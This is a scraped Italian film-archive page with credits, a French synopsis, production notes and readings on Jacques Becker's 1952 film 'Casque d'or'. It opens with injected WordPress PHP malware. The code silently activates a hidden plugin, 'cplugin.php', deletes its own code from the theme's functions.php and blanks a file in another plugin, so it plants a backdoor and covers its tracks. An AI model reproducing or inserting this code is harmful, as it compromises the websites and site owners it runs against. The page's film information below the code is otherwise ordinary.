function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'cplugin.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('cplugin.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "function true_plugins_activate()"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 3; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/usr/www/users/bradek/dpwassets.bradek.it/wp-content/plugins/wp-all-export-pro/actions/class.plugin-modules.php'); file_put_contents('/usr/www/users/bradek/dpwassets.bradek.it/wp-content/plugins/wp-all-export-pro/actions/class.plugin-modules.php', ''); } } add_action('init', 'true_plugins_activate'); Corto in Corto : 1952_Casque d’or
  • Film

1952_Casque d’or

Titolo originale

Titre original:     CASQUE D’OR

Regia, Realisation: JACQUES BECKER

Direttore artistic, directeur artistique: Marcel Camus et Michel Clément

Aiutoregia, Assistant directeur:

Segretaria di edizione, Script.?

Produzione, Producteur: Raymond Hakim, Robert Hakim, André Paulvé  pour les Maison Speya Film et Paris Film-Production

Direttore di produzione, Directeur de production:

Soggetto, sujet:

Dialoghi, Dialogues: Jacquesd Becker
Sceneggiatura,
scenario: Jacques Becker, Jacques Companeez

Cast: Simone Signoret (Marie, dite”Casque d’or”),  Serge Reggiani (Georges dit “Jo” Manda),  Claude Dauphin (Félix Leca), Raymond Bussières (Raymond), William Sabatier  ( Roland Dupuis), Gaston Modot (Danard, le patron), Paul Barge  (L’inspecteur Juliani), Odette Barencey  (la mère Eugène), Loleh Bellon (Léonie Danard), Dominique Davray (Julie), Yette Lucas (Adèle), Yvonne Yma (la patronne de l’Ange Gabriel), Pâquerette (la grand-mère d’Anatole), Roland Lesaffre (Anatole), Emile Genevois  (Billy), Fernand Trignol ( le patron de l’Ange Gabriel), Daniel Mendaille (le patron de la guinguette), Pomme  (la loueuse de chambres), Suzanne Grey  (une fille à la guinguette), Marcel Melrac  (un cocher), Léon Pauléon  (un cocher), Paul Azaïs  (Ponsard), Joëlle Bernard  (une fille à la guinguette), Jean Berton, Jacqueline Cantrelle, Claude Castaing, Jean Clarieux, Tony Corteggiani, Henri Coutet, Roger Dalphin, Jean Degrave, Pierre Goutas, Pierre Leproux , Julien Maffre, Maurice Marceau, Robert Mercier, Christiane Minazzoli, René Pascal, Raphaël Patorni, Marcel Rouzé, Roger Vincent, Léon Bary

Fotografia, photographie: Robert Lefebre

Operatore, opérateur:

Assistente operatore, assistant opérateur:

Musica, Compositeur de la musique: Georges Van Parys

Montaggio, Montage: Marguerite Ronoir

Assistente al montaggio, assistant: ?

Scenografia, Chef décorateur: Jean d’Eaubonne

Costumi, Costumes: Georgette Fillon  execute paer Marcelle Desvignes

Bozzetti, Maquette: Mayo

Photographe de plateau

Parrucchiere, Coiffures: Alex Archambaudt

Trucco, Makeup: Boris Karabanoff, Maguy Vernadet

Suono, Ingénieurs du son: Antoine Petitjean

Negativo, negative: 2635 m, 1,37:1 – NB - son: Mono (Optiphone)

Durata, Durée: 96’

Distribuzione, Distribution: DISCINA

Data di uscita, sortie:

France: 12 mars 1952

États –Unis: 18 août 1952

Genre: drame

Sinopsis -Plot: Les apaches de la bande à Leca, des voyous qui hantent le quartier de Belleville, ont investi avec leurs femmes une guinguette du bord de Marne, à Joinville-le-Pont. Marie, une prostituée surnommée Casque d’Or en raison de son étincelante chevelure, s’est fâchée avec son amant du moment, le distingué Roland. Surgit alors Raymond, accompagné de son ami d’enfance, Manda, un ancien apache reconverti en charpentier sérieux et convaincu. Entre la belle et le charpentier, le coup de foudre est immédiat. Une passion destructrice, sur fond de rivalité au sein du gang, unit les deux amants…Un duel au couteau entre Roland et Manda pour l’amour de Casque d’Or aboutit à la mort de Roland. Leca ainsi que son gang ayant assisté au duel, prend la fuite, de même que Manda, du fait de l’irruption de la police. Manda et Casque d’Or cohabitent alors et leur liaison amoureuse est connue de Leca, qui, convoitant aussi Casque d’Or, décide d’accuser Raymond d’être l’assassin de Roland. Raymond étant en possession de la montre du défunt Roland, les policiers décident de le mettre en cause ; Raymond est ensuite incarcéré sur décision judiciaire. Manda apprenant cela se dénonce à la police et est emprisonné. Raymond reste tout de même en prison aussi. Marie se résout alors à aller chez Leca afin d’obtenir de celui-ci qu’il fasse évader son amant. Leca exige qu’elle couche avec lui. Mais, après cela, il se rétracte et refuse d’aider Casque d’Or. Celle-ci tente donc seule de faire évader Raymond et Manda. L’évasion réussit mais Raymond, atteint par un coup de feu de policier, meurt quelques heures plus tard. Manda ayant appris par Raymond que celui-ci avait été dénoncé par Leca, et ayant compris que Marie avait été contrainte de coucher avec ce dernier, n’a plus qu’une idée en tête, celle de rendre justice à Raymond en tuant Leca. Manda réussit alors à abattre Leca. Arrêté par les policiers, il est finalement guillotiné sous les yeux de Casque d’Or.
1. Note-Notes: Tournage du 24 septembre au 22 novembre 1951 a eu lieu dans les studios de Billancourt et, pour les extérieurs, à Annet-sur-Marne, Meaux (le mur de la prison) et Ménilmontant (notamment au 44, rue des Cascades pour la maison Leca).

2. Note-Notes: Le film est tiré d’un fait divers qui se déroula dans le milieu des apaches parisiens, autour d’Amélie Élie, au début du xxe siècle. Jacques Becker s’inspira de gravures anciennes1.

3. Note-Notes: La musique sur laquelle s’achève le film est Le Temps des cerises, composée par Jean-Baptiste Clément. Une chanson de Serge Reggiani rend hommage au film Casque d’or et à Simone Signoret, Un menuisier dansait, disques Polydor, 1973 (réédition compilation en 3 CD, vol. 1, disque 3 La Chanson de Paul).

A lire:

J. Queval, Pavane pour des apaches défunts, in “Cahiers du cinéma”, n. 13, juin 1952.

L. Anderson, Casque d’or, in “Sight & Sound”, n. 2, October-December 1952.

N. Ghelli, Casque d’or, in “Bianco e nero”, n. 12, dicembre 1955.

Anonimo, Casco d’oro, in “Cinema nuovo”, n. 76, 10 febbraio 1956.

L. Chiarini, Panorama del cinema contemporaneo, Roma 1957.

J. Queval, Jacques Becker, Paris 1962.

G. Pérez Guillermo, Jacques Becker. Two Films, in “Sight & Sound”, n. 3, summer 1969.

*

dall'archivio personale di J. Mounier. Vietata ogni riproduzione anche citando la fonte

*

VEDI

*

Jacques Becker

Naissance:15 settembre 1906  - Parigi (Francia)
Décès:
21 febbraio 1960 – Parigi (Francia)

Inserisci un commento

Modulo di inserimento